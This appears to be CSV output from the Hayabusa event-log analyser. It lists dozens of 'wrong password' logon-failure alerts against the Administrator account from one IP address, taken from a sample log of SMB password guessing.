+2016-09-20 01:51:53.862 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pGGGazMTBBfrppDZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.919 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NKO4V35Y2qPEB59W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.964 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WxVdhpR7ZnAluurU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.016 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gZjAZb9bQKZjwL8u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.066 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aKyLX5ChpgBuFEbr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.112 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 49t2xJvH2yHcyHle | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.168 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sg9Z6Pyix2UkMolr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.210 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0NN2olYn97ZoYCja | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.249 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: S98j54bDGsz0k6g9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.284 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XxFEw9s0nnEQGzUN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.342 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wSswFHFSlqcQd47k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.385 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7icutlVIWSLZJszQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.440 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DSwyugYn0n3i5f25 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.473 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RmBaLCUcR7TmixTy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1oOBz2NQSCdTwa7V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.582 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O4tU1LPF5DRW9Vm0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.633 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SRsSNqPYruWBzp2n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.684 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3JZhBLzt4af1VtCU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.729 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dFLZIKSDBvBaWq59 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.774 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: guAG4ZTFMjZAxp1A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.817 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Yd04xsSIdiczICeG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.865 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Cx3i1URKPhC6KWI7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.914 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Npc6IS27HsWP3JA9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.963 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KIBnr0eZ1bHHGokW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.013 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6gTTrUVjpPU80LlC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.078 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FZlmUbCNAJga24JH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.136 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Zf3aSGBMe97VujaH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8bx7ZM77aDG7y6Lh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.220 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BnHHAClMwyqA3TTI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.260 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 00ibRrYvnFt5w9X0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.300 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VglTKbnLVFvHZHzQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.358 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3NwX0sDFwHQG7Tkq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.413 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3mMx3M1zurKMBzyj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.468 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sH7b8P0O0uea3PlN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.530 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TJcrTyBPuX0TcvOT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.574 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kwuZIQAL3BmJnPsJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.620 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lxgAfsnH6YWLRD0a | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ttBOjzmEBjr9W2QW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.732 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FPDKGGYkJQeWgtUf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.848 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nSoJWqS6YPbpCiBf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.887 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Pr2oMzxv7pcDfsgw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.940 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jiopmZAMpwg3dEaA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.989 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tG1Bxm0lt3vwoO5V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.043 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9Kf5AaQX7KOVAIAN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.097 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FW9nBirBTHIXIrfp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.148 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: S9qKcDhfcf2kMk00 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9NgStzf2xQ4P7q0d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.225 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j9mCrjQykX06IcMf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.256 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7S0QccvEhetekdDP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.298 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n1OnibuatFHwDeLz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.342 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O8u26bKzFOw12m0T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.380 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WEEtOj6BOkI7MPY1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.420 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EiCpuqll36DojD3e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.469 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p9zjo9ZsSVLZcrsr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.530 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KKDD0O5flEsIEDRZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.582 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jdPMREVdBEJ50ELC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.626 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p7YwRYYCnsr2v08C | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.677 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nWyAzzpmxUm2CXE9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.724 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9RNqhxyUBjUIic0n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.774 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1JERyz3mOBZt2jki | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.817 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V0i93RW5AOsIKKMU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.875 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U3XEu06vE68O900O | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.925 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0fxeGE2jXOnoJttj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.969 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6Wdg3l6IFHTdh09j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.028 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4XLVQRnkUd3bfgvF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.080 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rHjqFQwqpCJFI6qP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.139 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L5pEWq2mYsFpFLbb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HSFKJXTC2wlyw0gu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.225 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vh5igCJpAA5rmqzV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.260 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5NzLlJWkfXDcm64c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.309 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i9sR1QHgZ4oaa82F | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.340 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Pq1GWcKzSHSP28hk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.388 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: agCtM0s62zXPop0y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.430 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dVvglj7RtxrBUeXi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
